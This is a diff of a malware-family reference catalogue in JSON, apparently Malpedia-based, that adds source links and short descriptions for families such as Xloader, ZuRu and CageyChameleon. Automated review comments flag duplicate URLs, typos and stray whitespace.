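Review bot: The rewritten refs for js.more_eggs still list the same Secureworks profile twice, once as `"https://www.secureworks.com/research/threat-profiles/gold-kingswood"` and once as `"http://www.secureworks.com/research/threat-profiles/gold-kingswood"`, differing only in scheme. Since this commit re-emits that whole run of refs, it is the natural place to drop the plain-http variant rather than carry both forward. The entry's closing lines after `"SKID",` are outside the hunk.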
@@ -5174,13 +6132,27 @@
 "uuid": "f6c80748-1cce-4f6b-92e9-f8a04ff3464a",
 "value": "Starfighter (Javascript)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.swid",
+ "https://imp0rtp3.wordpress.com/2021/08/12/tetris/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d4be22cf-497d-46a0-8d57-30d10d9486e3",
+ "value": "Swid"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext",
 "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/"
+ "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/"
 ],
 "synonyms": [],
 "type": []
@@ -5241,6 +6213,19 @@
 "uuid": "a15e7c49-4eb6-46f0-8f79-0b765d7d4e46",
 "value": "Unidentified JS 004"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_005",
+ "https://blogs.jpcert.or.jp/en/2021/07/water_pamola.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a797e9b9-cb3f-484a-9273-ac73e9ea1e06",
+ "value": "Unidentified JS 005 (Stealer)"
+ },
 {
 "description": "",
 "meta": {
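Review bot: The ref added to js.turla_ff_ext, `"https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/"`, has the same date and path as the existing `"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/"` two lines above, so it looks like the same article under a second hostname rather than a new source. If one host merely mirrors or redirects to the other, keep only the canonical one; if both are deliberately kept (for example because the custom domain has lapsed), a short note in the entry description would save the next editor from "fixing" it.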
@@ -5258,12 +6243,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.valak",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
 "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7",
 "https://twitter.com/malware_traffic/status/1207824548021886977",
 "https://security-soup.net/analysis-of-valak-maldoc/",
 "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
 "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/",
 "https://unit42.paloaltonetworks.com/valak-evolution/",
+ "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
 "https://blog.talosintelligence.com/2020/07/valak-emerges.html"
 ],
 "synonyms": [
@@ -5292,6 +6279,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
 "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e",
 "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g",
@@ -5309,7 +6297,8 @@
 "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
 "https://us-cert.cisa.gov/ncas/alerts/aa21-048a",
 "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://objective-see.com/blog/blog_0x49.html"
+ "https://objective-see.com/blog/blog_0x49.html",
+ "https://www.youtube.com/watch?v=1NkzTKkEM2k"
 ],
 "synonyms": [],
 "type": []
@@ -5337,9 +6326,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c",
 "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
+ "https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore--leaves-it-unused.html",
+ "https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20"
 ],
 "synonyms": [
 "SurfBuyer"
@@ -5406,6 +6397,19 @@
 "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf",
 "value": "Coldroot RAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.convuster",
+ "https://securelist.com/convuster-macos-adware-in-rust/101258/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3819ded3-27ac-4e2f-9cd6-c6ef1642599b",
+ "value": "Convuster"
+ },
 {
 "description": "",
 "meta": {
@@ -5468,6 +6472,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
 "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
 "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
@@ -5543,6 +6548,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat",
 "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
 "https://objective-see.com/blog/blog_0x61.html"
 ],
 "synonyms": [],
@@ -5570,6 +6576,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest",
+ "https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://github.com/gdbinit/evilquest_deobfuscator",
 "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/",
 "https://objective-see.com/blog/blog_0x59.html",
@@ -5603,11 +6611,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher",
- "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
- "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/",
 "https://objective-see.com/blog/blog_0x4F.html",
+ "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/",
+ "https://securelist.com/finspy-unseen-findings/104322/",
 "https://objective-see.com/blog/blog_0x5F.html",
- "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/"
+ "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
+ "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/"
 ],
 "synonyms": [],
 "type": []
@@ -5899,6 +6908,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://twitter.com/BitsOfBinary/status/1321488299932983296",
 "https://twitter.com/BitsOfBinary/status/1337330286787518464",
 "https://www.anquanke.com/post/id/223817"
@@ -5951,6 +6961,7 @@
 "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
 "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/",
 "https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
 "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam"
 ],
 "synonyms": [],
@@ -6090,8 +7101,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer",
- "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/",
+ "https://objective-see.com/blog/blog_0x64.html",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508",
+ "https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/",
+ "https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/",
 "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/",
 "https://securelist.com/shlayer-for-macos/95724/"
 ],
 "synonyms": [],
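Review bot: In the hunk starting at -5951 the added ref `"https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries"` points at the root of a large repository rather than at the query that concerns this family, so a reader cannot tell which content it is meant to support and the link will drift as the repository changes. If a specific hunting query was the source, link to it by path, ideally commit-pinned; otherwise the ref adds little over the entry's existing sources. The enclosing entry begins before this hunk, so I could not check its `value`.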
@@ -6279,8 +7295,12 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset",
 "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf",
+ "https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram--other-apps.html",
+ "https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/",
+ "https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/",
- "https://objective-see.com/blog/blog_0x5F.html"
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/"
 ],
 "synonyms": [],
 "type": []
@@ -6288,6 +7308,26 @@
 "uuid": "041aee7f-cb7a-4199-9fe5-494801a18273",
 "value": "XCSSET"
 },
+ {
+ "description": "Xloader is a Rebranding of Formbook malware (mainly a stealer), available for macOS as well.\r\n\r\nFormbook has a \"magic\"-value FBNG (FormBook-NG), while Xloader has a \"magic\"-value XLNG (XLoader-NG). This \"magic\"-value XLNG is platform-independent.\r\n\r\n\r\nNot to be confused with apk.xloader or ios.xloader.\r\n",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader",
+ "https://twitter.com/krabsonsecurity/status/1319463908952969216",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
+ "https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/",
+ "https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/",
+ "https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/",
+ "https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/"
+ ],
+ "synonyms": [
+ "Formbook"
+ ],
+ "type": []
+ },
+ "uuid": "d5f2f6ad-2ed0-42d4-9116-f95eea2ab543",
+ "value": "Xloader"
+ },
 {
 "description": "",
 "meta": {
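Review bot: The new osx.xloader description carries stray line-break sequences: a triple `\r\n\r\n\r\n` before "Not to be confused" and a trailing `\r\n` at the very end of the string, neither of which the neighbouring descriptions use. Trimming those and lower-casing the common noun (`Xloader is a rebranding of Formbook malware`) keeps the text consistent with the rest of the file. Listing `"Formbook"` as a synonym also presumably collides with a separate Formbook entry elsewhere in the cluster; if so, the description already names apk.xloader and ios.xloader, and naming that entry in the same sentence would make the relationship explicit.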
@@ -6316,6 +7356,20 @@
 "uuid": "725cd3eb-1025-4da3-bcb1-a7b6591c632b",
 "value": "Yort"
 },
+ {
+ "description": "A malware that was observed being embedded alongside legitimate applications (such as iTerm2) offered for download on suspicious websites pushed in search engines. It uses a Python script to perform reconnaissance on the compromised system an pulls additional payload(s).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.zuru",
+ "https://objective-see.com/blog/blog_0x66.html",
+ "https://www.trendmicro.com/en_us/research/21/i/mac-users-targeted-by-trojanized-iterm2-app.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bd293592-d2dd-4fdd-88e7-6098e0bbb043",
+ "value": "ZuRu"
+ },
 {
 "description": "Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.",
 "meta": {
@@ -6367,6 +7421,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf",
 "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a",
 "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
 "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf"
@@ -6397,9 +7452,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas",
- "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
 "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
+ "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
 "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html"
 ],
 "synonyms": [],
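Review bot: The new osx.zuru description has a typo in its last sentence, `an pulls additional payload(s)`, which should read `and pulls additional payload(s)`. The opening `A malware that was observed being embedded` would also read more naturally as `Malware observed being embedded alongside legitimate applications`, but the missing letter is the fix worth making before merge.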
@@ -6458,6 +7514,7 @@
 "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/",
 "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/",
 "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://nsfocusglobal.com/apt34-event-analysis-report/",
 "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
@@ -6495,9 +7552,14 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf",
 "https://vblocalhost.com/uploads/VB2020-46.pdf"
 ],
- "synonyms": [],
+ "synonyms": [
+ "BoBoStealer"
+ ],
 "type": []
 },
 "uuid": "6f0f034a-13f1-432d-bc70-f78d7f27f46f",
@@ -6816,6 +7878,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2"
 ],
 "synonyms": [],
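Review bot: In the ps1.flowerpower hunk (starting at -6495) the added ref `"https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf"` has the same path and filename as the existing `"https://vblocalhost.com/uploads/VB2020-46.pdf"` on the very next line, so it appears to be the same paper served from a second hostname. If one of the two resolves to the other, keep only the canonical URL; otherwise the pair will be flagged by any future de-duplication of the refs lists. The enclosing entry begins before the hunk.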
@@ -6842,6 +7905,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca",
 "https://youtu.be/pBDu8EGWRC4?t=2492",
 "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
@@ -6900,8 +7964,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload",
 "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9",
- "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy",
 "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/",
+ "https://blog.minerva-labs.com/sload-targeting-europe-again",
 "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/",
 "https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/",
 "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
@@ -6910,7 +7974,8 @@
 "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/",
 "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan",
 "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/",
- "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html"
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html",
+ "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy"
 ],
 "synonyms": [
 "Starslord"
@@ -7105,7 +8170,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://github.com/AlessandroZ/LaZagne",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
 "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
 "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf"
 ],
@@ -7120,12 +8187,21 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph",
+ "https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html",
 "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
+ "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/",
+ "https://twitter.com/xuy1202/status/1393384128456794116",
 "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
- "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/"
+ "https://www.lacework.com/the-kek-security-network/",
+ "https://github.com/lacework/lacework-labs/tree/master/keksec",
+ "https://www.lacework.com/keksec-tsunami-ryuk/",
+ "https://twitter.com/xuy1202/status/1392089568384454657",
+ "https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/",
+ "https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/"
 ],
 "synonyms": [
- "FreakOut"
+ "FreakOut",
+ "Necro"
 ],
 "type": []
 },
@@ -7164,6 +8240,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat",
 "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-stibnite/",
 "https://securelist.com/apt-trends-report-q3-2020/99204/",
 "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
 "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
@@ -7226,6 +8303,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.responder",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
 "https://github.com/lgandx/Responder"
 ],
 "synonyms": [
@@ -7294,6 +8372,7 @@
 "description": "",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001",
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001"
 ],
 "synonyms": [],
@@ -7306,6 +8385,7 @@
 "description": "",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002",
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002"
 ],
 "synonyms": [],
@@ -7318,6 +8398,7 @@
 "description": "",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003",
 "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003"
 ],
 "synonyms": [],
@@ -7326,6 +8407,19 @@
 "uuid": "43282411-4999-4066-9b99-2e94a17acbd4",
 "value": "unidentified_003"
 },
+ {
+ "description": "Ransomware written in Python and delivered as compiled executable created using PyInstaller.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.venomous",
+ "https://blog.cyble.com/2021/08/04/a-deep-dive-analysis-of-venomous-ransomware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0bd5aed2-9c74-41a5-9fcf-9379f2cb0e2c",
+ "value": "Venomous"
+ },
 {
 "description": "",
 "meta": {
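Review bot: The hunks starting at -7294, -7306 and -7318 each add a ref that is byte-identical to the one already present in the same `refs` array, e.g. `"https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001"` directly above the existing `"https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001"`. An exact duplicate carries no information and reads as the import script emitting the Malpedia self-link twice for entries whose only ref is that link, rather than as a deliberate change. I would drop the three added lines and have the generator de-duplicate a refs array before writing it, so the same artefact does not reappear on the next sync.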
@@ -7339,6 +8433,25 @@
 "uuid": "9f85f4fc-1cce-4557-b3d8-b9ef522fafb2",
 "value": "FlexiSpy (symbian)"
 },
+ {
+ "description": "CageyChameleon Malware is a VBS-based backdoor which has the capability to enumerate the list of running processes and check for the presence of several antivirus products. CageyChameleon will collect user host information, system current process information, etc. The collected information is sent back to the C2 server, and continue to initiate requests to perform subsequent operations.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon",
+ "https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/",
+ "https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314",
+ "https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf",
+ "https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf",
+ "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/",
+ "https://www.clearskysec.com/cryptocore-group/",
+ "https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ea71b7c1-79eb-4e9c-a670-ea75d80132f4",
+ "value": "CageyChameleon"
+ },
 {
 "description": "",
 "meta": {
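Review bot: The new vbs.cageychameleon description has a subject/verb slip in its last sentence, `is sent back to the C2 server, and continue to initiate requests`; it should read `and the backdoor continues to initiate requests to perform subsequent operations`. `CageyChameleon Malware is a VBS-based backdoor` also capitalises a common noun where `CageyChameleon is a VBS-based backdoor` would match the phrasing of the other descriptions in this file.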
@@ -7418,11 +8531,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion",
- "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/",
 "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader",
- "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/",
 "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/",
- "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf"
+ "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf",
+ "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/",
+ "https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/",
+ "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/"
 ],
 "synonyms": [],
 "type": []
@@ -7443,6 +8557,19 @@
 "uuid": "a583a2db-616e-48e5-b12b-088a378c2307",
 "value": "lockscreen"
 },
+ {
+ "description": "MOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected zip attached to a phishing email. Based on Fireeye intrusion data from responding to ICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.mouseisland",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e9afcd80-c1c6-4194-af32-133fe31e835f",
+ "value": "MOUSEISLAND"
+ },
 {
 "description": "Downloads NodeJS when deployed.",
 "meta": {
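Review bot: The new vbs.mouseisland description ends with a trailing space inside the string value (`to install ICEDID. "`) and spells the vendor `Fireeye` where the company writes its name FireEye. Both are cosmetic, but trailing whitespace inside a JSON string survives every parser and shows up in exact-match comparisons, so I would trim it and normalise the name before merge.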
@@ -7522,12 +8649,17 @@
 "value": "WhiteShadow"
 },
 {
- "description": "",
+ "description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger",
- "https://habr.com/ru/company/group-ib/blog/477198/",
- "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89"
+ "https://twitter.com/James_inthe_box/status/1401921257109561353",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/",
+ "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89",
+ "https://habr.com/ru/company/group-ib/blog/477198/"
 ],
 "synonyms": [
 "404KeyLogger",
@@ -7777,7 +8909,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.adamantium_thief",
- "https://github.com/LimerBoy/Adamantium-Thief"
+ "https://github.com/LimerBoy/Adamantium-Thief",
+ "https://twitter.com/ClearskySec/status/1377176015189929989"
 ],
 "synonyms": [],
 "type": []
@@ -7886,6 +9019,7 @@
 "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
 "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4",
+ "https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf",
 "https://www.secureworks.com/research/threat-profiles/iron-hunter",
